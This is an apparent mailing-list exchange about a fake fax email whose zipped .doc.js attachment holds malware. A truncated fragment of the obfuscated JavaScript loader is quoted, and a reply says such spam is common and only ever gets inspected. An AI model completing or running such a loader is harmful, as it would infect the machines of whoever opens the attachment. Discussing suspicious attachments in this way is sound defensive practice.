On 11/09/2015 07:57 AM, Carlos E. R. wrote:
Hi,
I just got a malware email (5 KB). It claims to be a FAX document, but of course it is not. It is zipped, thus not every tool would see it. When expanded, it contains a file with .doc.js extension.
It is a single line of what is probably JavaScript code.
var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C50 5556555E55";function y5(){return 'xa.clo';};function c8(){return 'jet.c';};function n9(){return ' = WS';};function r8(){retur
Would this "work" on Linux? Is anybody interested in having a look at it?
I get a dozen of these a day in my spam trap. It's always in a zip or a PDF, or a fax of something mislabeled. I seldom ever look at these at all, but they score low enough in SpamAssassin to get into the spam bin as opposed to being summarily junked by Amavisd. Anyway, I never touch them on a Windows machine, do all my inspections on Linux, and have never had one of these do anything, but then the only thing I do is LOOK at the contents of the zip. I can't imagine trying to execute one of these things, even as an experiment, even in a virtual machine. I can't imagine yours is special in any way; these things are everywhere, and anyone interested in researching these to see if they might work in Linux has a boatload of them to work with.

--
After all is said and done, more is said than done.